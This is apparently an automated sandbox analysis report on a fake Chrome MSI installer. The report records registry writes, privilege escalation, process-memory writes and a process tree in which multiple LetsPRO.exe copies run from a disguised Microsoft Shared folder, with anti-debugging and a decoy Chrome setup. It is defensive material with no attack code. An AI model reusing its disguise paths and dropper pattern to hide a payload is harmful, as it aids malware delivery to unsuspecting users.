\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1C4CDEFF-756A-4804-9E77-3E8EB9361016}\VersionIndependentProgID GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreClass\CurVer\ = "GoogleUpdate.CoreClass.1" GoogleUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69}\ProgID\ = "GoogleUpdate.Update3COMClassService.1.0" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\NumMethods\ = "11" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32\ = "{B50B3FA2-B519-4C16-A932-46E9FFD1D910}" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ = "IJobObserver" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\NumMethods\ = "12" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\VersionIndependentProgID\ = "GoogleUpdate.PolicyStatusMachine" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\ = "ICoCreateAsync" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D}\VersionIndependentProgID GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\ProxyStubClsid32\ = "{B50B3FA2-B519-4C16-A932-46E9FFD1D910}" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32\ = "{B50B3FA2-B519-4C16-A932-46E9FFD1D910}" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221} GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassMachine.1.0\ = "Google Update Broker Class Factory" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\Elevation\IconReference = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\goopdate.dll,-1004" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32\ = "{B50B3FA2-B519-4C16-A932-46E9FFD1D910}" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA} GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7DE94008-8AFD-4C70-9728-C6FBFFF6A73E}\LocalServer32 GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\NumMethods\ = "10" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\ProxyStubClsid32\ = "{B50B3FA2-B519-4C16-A932-46E9FFD1D910}" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\NumMethods\ = "10" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6} GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.372\\psmachine_64.dll" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C}\ProxyStubClsid32\ = "{B50B3FA2-B519-4C16-A932-46E9FFD1D910}" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreClass\CLSID\ = "{E225E692-4B47-4777-9BED-4FD7FE257F0E}" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\ProxyStubClsid32 GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9} GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CredentialDialogMachine.1.0\CLSID\ = "{25461599-633D-42B1-84FB-7CD68D026E53}" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ = "IJobObserver2" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{084D78A8-B084-4E14-A629-A2C419B0E3D9} GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ = "IAppVersion" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DCAB8386-4F03-4DBD-A366-D90BC9F68DE6}\ProxyStubClsid32 GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods\ = "4" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\NumMethods GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\NumMethods\ = "12" GoogleUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\ = "IAppCommand2" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\ = "IProcessLauncher2" GoogleUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\VersionIndependentProgID GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\ProgID\ = "GoogleUpdate.ProcessLauncher.1.0" GoogleUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D} GoogleUpdate.exe -
Suspicious behavior: EnumeratesProcesses 41 IoCs
pid Process 2256 msiexec.exe 2256 msiexec.exe 3772 LetsPRO.exe 3772 LetsPRO.exe 1628 LetsPRO.exe 1628 LetsPRO.exe 540 LetsPRO.exe 540 LetsPRO.exe 4188 LetsPRO.exe 4188 LetsPRO.exe 1712 LetsPRO.exe 1712 LetsPRO.exe 2468 LetsPRO.exe 2468 LetsPRO.exe 4672 LetsPRO.exe 4672 LetsPRO.exe 3236 LetsPRO.exe 3236 LetsPRO.exe 3324 GoogleUpdate.exe 3324 GoogleUpdate.exe 2204 LetsPRO.exe 2204 LetsPRO.exe 2436 LetsPRO.exe 2436 LetsPRO.exe 3324 GoogleUpdate.exe 3324 GoogleUpdate.exe 3324 GoogleUpdate.exe 3324 GoogleUpdate.exe 1360 LetsPRO.exe 1360 LetsPRO.exe 3772 LetsPRO.exe 3772 LetsPRO.exe 4524 LetsPRO.exe 4524 LetsPRO.exe 3940 powershell.exe 3772 LetsPRO.exe 3772 LetsPRO.exe 3772 LetsPRO.exe 3772 LetsPRO.exe 436 GoogleUpdate.exe 436 GoogleUpdate.exe -
Suspicious use of AdjustPrivilegeToken 55 IoCs
description pid Process Token: SeShutdownPrivilege 4408 msiexec.exe Token: SeIncreaseQuotaPrivilege 4408 msiexec.exe Token: SeSecurityPrivilege 2256 msiexec.exe Token: SeCreateTokenPrivilege 4408 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4408 msiexec.exe Token: SeLockMemoryPrivilege 4408 msiexec.exe Token: SeIncreaseQuotaPrivilege 4408 msiexec.exe Token: SeMachineAccountPrivilege 4408 msiexec.exe Token: SeTcbPrivilege 4408 msiexec.exe Token: SeSecurityPrivilege 4408 msiexec.exe Token: SeTakeOwnershipPrivilege 4408 msiexec.exe Token: SeLoadDriverPrivilege 4408 msiexec.exe Token: SeSystemProfilePrivilege 4408 msiexec.exe Token: SeSystemtimePrivilege 4408 msiexec.exe Token: SeProfSingleProcessPrivilege 4408 msiexec.exe Token: SeIncBasePriorityPrivilege 4408 msiexec.exe Token: SeCreatePagefilePrivilege 4408 msiexec.exe Token: SeCreatePermanentPrivilege 4408 msiexec.exe Token: SeBackupPrivilege 4408 msiexec.exe Token: SeRestorePrivilege 4408 msiexec.exe Token: SeShutdownPrivilege 4408 msiexec.exe Token: SeDebugPrivilege 4408 msiexec.exe Token: SeAuditPrivilege 4408 msiexec.exe Token: SeSystemEnvironmentPrivilege 4408 msiexec.exe Token: SeChangeNotifyPrivilege 4408 msiexec.exe Token: SeRemoteShutdownPrivilege 4408 msiexec.exe Token: SeUndockPrivilege 4408 msiexec.exe Token: SeSyncAgentPrivilege 4408 msiexec.exe Token: SeEnableDelegationPrivilege 4408 msiexec.exe Token: SeManageVolumePrivilege 4408 msiexec.exe Token: SeImpersonatePrivilege 4408 msiexec.exe Token: SeCreateGlobalPrivilege 4408 msiexec.exe Token: SeRestorePrivilege 2256 msiexec.exe Token: SeTakeOwnershipPrivilege 2256 msiexec.exe Token: SeRestorePrivilege 2256 msiexec.exe Token: SeTakeOwnershipPrivilege 2256 msiexec.exe Token: SeRestorePrivilege 2256 msiexec.exe Token: SeTakeOwnershipPrivilege 2256 msiexec.exe Token: SeRestorePrivilege 2256 msiexec.exe Token: SeTakeOwnershipPrivilege 2256 msiexec.exe Token: SeRestorePrivilege 2256 msiexec.exe Token: SeTakeOwnershipPrivilege 2256 msiexec.exe Token: SeRestorePrivilege 2256 msiexec.exe Token: SeTakeOwnershipPrivilege 2256 msiexec.exe Token: SeRestorePrivilege 2256 msiexec.exe Token: SeTakeOwnershipPrivilege 2256 msiexec.exe Token: SeRestorePrivilege 2256 msiexec.exe Token: SeTakeOwnershipPrivilege 2256 msiexec.exe Token: SeDebugPrivilege 3324 GoogleUpdate.exe Token: SeDebugPrivilege 3324 GoogleUpdate.exe Token: SeDebugPrivilege 3324 GoogleUpdate.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 4540 taskkill.exe Token: SeDebugPrivilege 3376 taskkill.exe Token: SeDebugPrivilege 436 GoogleUpdate.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4408 msiexec.exe 4408 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2256 wrote to memory of 1412 2256 msiexec.exe 89 PID 2256 wrote to memory of 1412 2256 msiexec.exe 89 PID 2256 wrote to memory of 1412 2256 msiexec.exe 89 PID 2256 wrote to memory of 1628 2256 msiexec.exe 90 PID 2256 wrote to memory of 1628 2256 msiexec.exe 90 PID 2256 wrote to memory of 1628 2256 msiexec.exe 90 PID 2256 wrote to memory of 3772 2256 msiexec.exe 91 PID 2256 wrote to memory of 3772 2256 msiexec.exe 91 PID 2256 wrote to memory of 3772 2256 msiexec.exe 91 PID 2256 wrote to memory of 3872 2256 msiexec.exe 94 PID 2256 wrote to memory of 3872 2256 msiexec.exe 94 PID 2256 wrote to memory of 3872 2256 msiexec.exe 94 PID 2256 wrote to memory of 2344 2256 msiexec.exe 95 PID 2256 wrote to memory of 2344 2256 msiexec.exe 95 PID 2256 wrote to memory of 2344 2256 msiexec.exe 95 PID 2256 wrote to memory of 4228 2256 msiexec.exe 96 PID 2256 wrote to memory of 4228 2256 msiexec.exe 96 PID 2256 wrote to memory of 4228 2256 msiexec.exe 96 PID 2256 wrote to memory of 3180 2256 msiexec.exe 97 PID 2256 wrote to memory of 3180 2256 msiexec.exe 97 PID 2256 wrote to memory of 3180 2256 msiexec.exe 97 PID 2256 wrote to memory of 1120 2256 msiexec.exe 92 PID 2256 wrote to memory of 1120 2256 msiexec.exe 92 PID 2256 wrote to memory of 1120 2256 msiexec.exe 92 PID 2256 wrote to memory of 4336 2256 msiexec.exe 93 PID 2256 wrote to memory of 4336 2256 msiexec.exe 93 PID 2256 wrote to memory of 4336 2256 msiexec.exe 93 PID 2256 wrote to memory of 4664 2256 msiexec.exe 98 PID 2256 wrote to memory of 4664 2256 msiexec.exe 98 PID 2256 wrote to memory of 4664 2256 msiexec.exe 98 PID 3872 wrote to memory of 540 3872 LetsPRO.exe 99 PID 3872 wrote to memory of 540 3872 LetsPRO.exe 99 PID 3872 wrote to memory of 540 3872 LetsPRO.exe 99 PID 2256 wrote to memory of 4528 2256 msiexec.exe 102 PID 2256 wrote to memory of 4528 2256 msiexec.exe 102 PID 2256 wrote to memory of 4528 2256 msiexec.exe 102 PID 2256 wrote to memory of 2468 2256 msiexec.exe 101 PID 2256 wrote to memory of 2468 2256 msiexec.exe 101 PID 2256 wrote to memory of 2468 2256 msiexec.exe 101 PID 2256 wrote to memory of 1712 2256 msiexec.exe 100 PID 2256 wrote to memory of 1712 2256 msiexec.exe 100 PID 2256 wrote to memory of 1712 2256 msiexec.exe 100 PID 2344 wrote to memory of 4188 2344 LetsPRO.exe 109 PID 2344 wrote to memory of 4188 2344 LetsPRO.exe 109 PID 2344 wrote to memory of 4188 2344 LetsPRO.exe 109 PID 4228 wrote to memory of 2204 4228 LetsPRO.exe 110 PID 4228 wrote to memory of 2204 4228 LetsPRO.exe 110 PID 4228 wrote to memory of 2204 4228 LetsPRO.exe 110 PID 2256 wrote to memory of 4700 2256 msiexec.exe 103 PID 2256 wrote to memory of 4700 2256 msiexec.exe 103 PID 2256 wrote to memory of 4700 2256 msiexec.exe 103 PID 2256 wrote to memory of 3996 2256 msiexec.exe 104 PID 2256 wrote to memory of 3996 2256 msiexec.exe 104 PID 2256 wrote to memory of 3996 2256 msiexec.exe 104 PID 2256 wrote to memory of 3696 2256 msiexec.exe 105 PID 2256 wrote to memory of 3696 2256 msiexec.exe 105 PID 2256 wrote to memory of 3696 2256 msiexec.exe 105 PID 2256 wrote to memory of 4092 2256 msiexec.exe 106 PID 2256 wrote to memory of 4092 2256 msiexec.exe 106 PID 2256 wrote to memory of 4092 2256 msiexec.exe 106 PID 4664 wrote to memory of 3236 4664 LetsPRO.exe 107 PID 4664 wrote to memory of 3236 4664 LetsPRO.exe 107 PID 4664 wrote to memory of 3236 4664 LetsPRO.exe 107 PID 2256 wrote to memory of 2004 2256 msiexec.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\sutup-Chrome.13.26.x64.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4408
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 583CC0F67ED1BB10179691E1232310642⤵
- Loads dropped DLL
PID:1412
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1628
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3772
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"2⤵
- Executes dropped EXE
PID:1120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1120 -s 2363⤵
- Program crash
PID:4184
-
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"2⤵
- Executes dropped EXE
PID:4336
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:540
-
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4188
-
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2204
-
-
-
C:\Program Files (x86)\ChromeSetup.exe"C:\Program Files (x86)\ChromeSetup.exe"2⤵
- Drops file in Program Files directory
- Executes dropped EXE
PID:3180 -
C:\Program Files (x86)\Google\Temp\GUM475A.tmp\GoogleUpdate.exe"C:\Program Files (x86)\Google\Temp\GUM475A.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"3⤵
- Sets file execution options in registry
- Checks computer location settings
- Drops file in Program Files directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324 -
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:1752
-
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3356 -
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
PID:4072
-
-
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
PID:2804
-
-
C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
PID:5064
-
-
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNzIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QjgyNTExMzUtNzk4Ri00MTM5LUFENDYtOUMyNjkzRTgxNjg1fSIgdXNlcmlkPSJ7RkQyQ0RFQUItODMyQS00NjJGLUIwMjMtNjQxRDExQTkzM0JDfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezI4RDQ0RjRELTdEOTktNEVFNi05MThELTc0RDgwM0JGNjA5Qn0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjM3MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zNzIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7ODUyRDA3NUEtQ0I5RC02MzYwLTRFNEQtNDI3QkJCNEYxMUUxfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxNzk3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3908
-
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={852D075A-CB9D-6360-4E4D-427BBB4F11E1}&lang=zh-CN&browser=3&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{B8251135-798F-4139-AD46-9C2693E81685}"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1628
-
-
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3236
-
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1712
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2468
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"2⤵
- Executes dropped EXE
PID:4528
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"2⤵
- Executes dropped EXE
PID:4700
-
-
